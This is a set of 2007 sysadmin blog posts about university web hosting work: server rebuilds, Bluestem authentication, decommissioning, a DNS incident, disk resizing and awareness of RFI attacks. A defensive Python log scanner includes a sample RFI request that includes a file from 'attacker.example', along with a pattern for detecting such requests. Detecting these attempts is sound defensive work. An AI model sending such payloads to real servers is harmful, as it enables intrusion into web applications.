September MAR

Peter Woods | AppHosting | Thursday, September 27th, 2007

Nagios Rebuild: I've rebuilt the replacement Nagios server, and it will soon go into the testing phase. This server is built on RHEL5, which introduced some challenges to the build process. Our RHN server does not yet offer RHEL5, so I had to sync with the official Red Hat repository. As with any operating system upgrade, some things are functionally similar yet differ in syntax and configuration. RHEL5 uses yum instead of up2date to manage package updates. I had to experiment a little to find the yum commands that performed the functions I needed to build the system. Some of the RHEL4 configuration did not carry over directly, and I had to modify the LDAP configuration. Again, this took some experimentation. On a good note, the core RHEL5 installation is very compact and secure. I found that I had to add packages to get to the web server base that I wanted. In the security arena, this is very good. The network security team has approved the virtual machine configuration, and it has been moved to the production network. I'm in the process of finalizing network diagrams and such for this work effort.

StudentOrgs Web Server Enhancement: The web servers for the student organizations were reconfigured to provide VUnetID authenticated web pages. A new virtual host to handle the SSL traffic was added, and the BlueStem authentication modules were installed on the server. This was the first installation of the BlueStem modules in the shared web environment. The first application to take advantage of this was the student government elections.

Mailgate CSM Development Environment: I assisted my coworkers in the building of a test mailgate environment behind the CSM. I also worked with our vendor to create the necessary accounts on the AppHosting bastion hosts so that they can become accustomed to the mailgate environment that we are building.

Updated AntiVirus: The antivirus engine on the shared web servers has been upgraded to allow the server to continue receiving the updates.

FEVS02 Decommissioning: The original FEVS02 web server has been decommissioned.  It was previously replaced with a pair of load balanced servers behind the CSM, and was no longer in use. The FEVS02 virtual machine was deleted from the ESX environment.

Samsara Decommissioning: Samsara is in the process of being decommissioned. All services on this server have been disabled with the exception of SSH access and DHCP service for the IDEV network. The full decommissioning is scheduled for the beginning of October.

Operational Issues: My operational duties typically involve resolving Magic tickets related to the Unix/Linux servers, creating the weekly AppHosting incident report, and auditing service monitoring. These are the major operational issues that I've worked on this month.

  • Web Server RewriteRules: I implemented several iterations of RewriteRules at the request of the content owners.
  • RFI Communication: In performing the periodic review of the web server access and error logs, I noticed that several of the shared servers were receiving a noticeable number of remote file include (RFI) attacks. In this type of attack, the attacker attempts to include content from a remote server to gain elevated privileges on the target server. With the help of partner support, an informational email with recommendations was sent to the web-spiders mailing list.
  • DNS Incident: I became involved in this incident the following day to do some investigative work to determine the cause of the performance issue. There were no scheduled changes related to the DNS servers or the network equipment that affects them, and no breakfixes were called in during this time window. System logs did not indicate any unusual traffic during the incident window. With assistance from the network security team, we were able to identify a misconfigured upstream DNS server, which amplified requests for certain names to the point of resource saturation on the VU DNS servers.
  • Web Services Incident: A web services customer called stating that users of their website were experiencing frequent errors. I consolidated the error logs for both load balanced servers and performed a detailed log file analysis for the customer. The log files indicated that several of the main pages were attempting to include a non-existent supporting PHP page. Based on the name of the missing file, this page was probably intended to provide additional functionality to the calling page. I did not investigate the specific side effects of the missing page, but instead reported that the target file was missing. Additionally, this specific site has an unusually large number of files in one directory, and this is causing issues with the replication scripts. The replication issue affects only this particular site. There were also several MySQL errors in the PHP code for the site.
  • Server Resizing: The pair of load balanced servers that handle the miscellaneous vanity URLs reached 80% capacity in the content file system. This pair serves 63 virtual hosts containing content for quite a few departments across campus. Because the web servers are load balanced, the web presence for these sites was available during the change. The secondary server was shut down to add another virtual disk to the virtual machine and then powered back on. Once the server was back online, the content file system was grown live. The procedure was repeated for the primary server. Since SFTP uploads are pointed at the primary server only, content updates were not available during the reboot of the primary server. The total operation to reconfigure both virtual machines and grow the file systems took approximately 25 minutes to perform.
  • NetTracker Data Archival: I deleted 2004 data from NetTracker, and archived the 2005 data. This process took approximately 40 hours to complete. There is a nice feature in the output of the archive command that only displays the first and last months that were specified to be archived. This behavior is different from the delete command, which provides output for each specified month.
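
The log consolidation described under the Web Services Incident can be sketched roughly as follows. This is only an illustration in Python, not the analysis that was actually run: the sample log lines, paths, and the function name count_missing_includes are all made up, and the pattern assumes the usual PHP "failed to open stream" warning as it tends to appear in an Apache error log.

```python
import re
from collections import Counter

# Assumed format of a PHP missing-include warning in an Apache error log.
MISSING_INCLUDE = re.compile(
    r"(?:include|require)(?:_once)?\((?P<target>[^)]+)\).*?"
    r"failed to open stream: No such file or directory"
    r" in (?P<caller>\S+) on line \d+"
)


def count_missing_includes(lines):
    """Count (missing file, calling page) pairs across any number of log lines."""
    counts = Counter()
    for line in lines:
        match = MISSING_INCLUDE.search(line)
        if match:
            counts[(match.group("target"), match.group("caller"))] += 1
    return counts


# Hypothetical excerpts from the two load balanced servers.
SAMPLE_WEB1 = [
    "[Mon Sep 17 10:01:02 2007] [error] [client 10.0.0.5] PHP Warning:  "
    "include(extras.php) [function.include]: failed to open stream: "
    "No such file or directory in /var/www/example/index.php on line 12",
    "[Mon Sep 17 10:01:09 2007] [error] [client 10.0.0.7] File does not exist: "
    "/var/www/example/favicon.ico",
]
SAMPLE_WEB2 = [
    "[Mon Sep 17 10:02:30 2007] [error] [client 10.0.0.8] PHP Warning:  "
    "include(extras.php) [function.include]: failed to open stream: "
    "No such file or directory in /var/www/example/index.php on line 12",
]

# Consolidate both servers' logs before counting.
summary = count_missing_includes(SAMPLE_WEB1 + SAMPLE_WEB2)
for (target, caller), hits in summary.most_common():
    print(f"{hits:4d}  {target}  (included from {caller})")
```

Counting per (missing file, calling page) pair keeps the report short enough to hand to a customer even when the same warning repeats thousands of times.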

Almost Forgot

Peter Woods | Miscellaneous | Tuesday, September 25th, 2007

Two nights ago my five-year-old daughter asked for a "real" computer.  After a quick scan through the collection, she got the old iMac. It was the only one that I had around with a monitor. I did a quick Ubuntu update, and it was ready to go. As it was rebooting, she asked: "Daddy, is this when I type my name and password?" Gotta love it.

Server Resizing

Peter Woods | Web Services | Monday, September 24th, 2007

The servers that handle the vanity domains (61 virtual hosts) have been resized to accommodate the recent content growth.  The content file system was hovering around 80%, which means that it would be full relatively soon. The change was done with very little impact to the websites.  In fact, the web presence was available throughout the entire process by keeping one server in the load balanced pair online. Another 32GB virtual disk was added to each server, and the content file system was extended. Each server had to be momentarily shut down to add the new virtual disk. Once the server was powered back up and all services were restarted, the live file system was extended. It took about 25 minutes to double the size of two servers.
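
As a rough check on the numbers above, here is a small Python sketch of the before and after utilization. The 32GB original size is an assumption inferred from "double the size" combined with the 32GB disk that was added; the function name is made up for the example.

```python
def utilization_after_growth(size_gb, used_fraction, added_gb):
    """Return the used fraction of a file system after it grows by added_gb."""
    used_gb = size_gb * used_fraction
    return used_gb / (size_gb + added_gb)


ORIGINAL_GB = 32      # assumption: adding 32GB doubled the file system
USED_FRACTION = 0.80  # "hovering around 80%"
ADDED_GB = 32         # size of the new virtual disk

after = utilization_after_growth(ORIGINAL_GB, USED_FRACTION, ADDED_GB)
print(f"Utilization after resize: {after:.0%}")
```

Under those assumptions the same content fills about 40% of the grown file system.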

StudentOrgs Bluestem

Peter Woods | Web Services | Friday, September 14th, 2007

Bluestem authentication has been set up on the StudentOrgs webserver, which means the server now supports SSL. I'll need to update some documentation to reflect these changes.

RFI Communication

Peter Woods | Web Services | Wednesday, September 12th, 2007

The communication for the steady stream of RFI attempts has gone out to the Spiders mailing list.  This was basically an awareness email so that developers are mindful of what their code has to endure.
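
For anyone wondering what these attempts look like in an access log, here is a minimal Python sketch that flags requests whose query parameters carry a remote URL. It is an illustration only, not the review process actually used: the sample log lines and the function name rfi_candidates are hypothetical, and a parameter that legitimately holds a URL would also be flagged.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request portion of a common/combined format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<url>\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote scheme is treated as suspicious.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def rfi_candidates(lines):
    """Return (parameter, value) pairs whose value points at a remote URL."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group("url")).query
        # parse_qsl also decodes percent-encoded values such as http%3A%2F%2F...
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((name, value))
    return hits


# Hypothetical access log lines.
SAMPLE_LOG = [
    '10.0.0.9 - - [12/Sep/2007:03:14:15 -0500] '
    '"GET /index.php?page=http://attacker.example/cmd.txt? HTTP/1.1" 200 512',
    '10.0.0.4 - - [12/Sep/2007:03:15:01 -0500] '
    '"GET /about.html?ref=home HTTP/1.1" 200 1024',
]

suspects = rfi_candidates(SAMPLE_LOG)
for name, value in suspects:
    print(f"possible RFI attempt: {name}={value}")
```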

Things I Learned At 3AM…

Peter Woods | AppHosting | Tuesday, September 4th, 2007

Here are a few things that I learned during the ESX upgrade this weekend:

  1. "File — File server" is not a good name for a VM.  I kept wondering: Who would the NOC call if there was a problem with this VM?
  2. 30 minute Vmotions are not cool.  A handful of the VMs took 15-30 minutes to move.  It gets a little unnerving sitting at 94% for that long.
  3. Once the esxupdate is started, the admin is merely an observer.  My Comcast connection dropped out during the middle of an update, and the update continued on its own even though my shell dropped out from under it.

I also learned that there is a bug in the output of the NetTracker archive function.  The -remove option generates a message for each month in the list.  The -archive option only generates messages for the first and last months of the list.  I fully expected to see that only the first and last months had been archived when it completed.  Luckily this was not the case.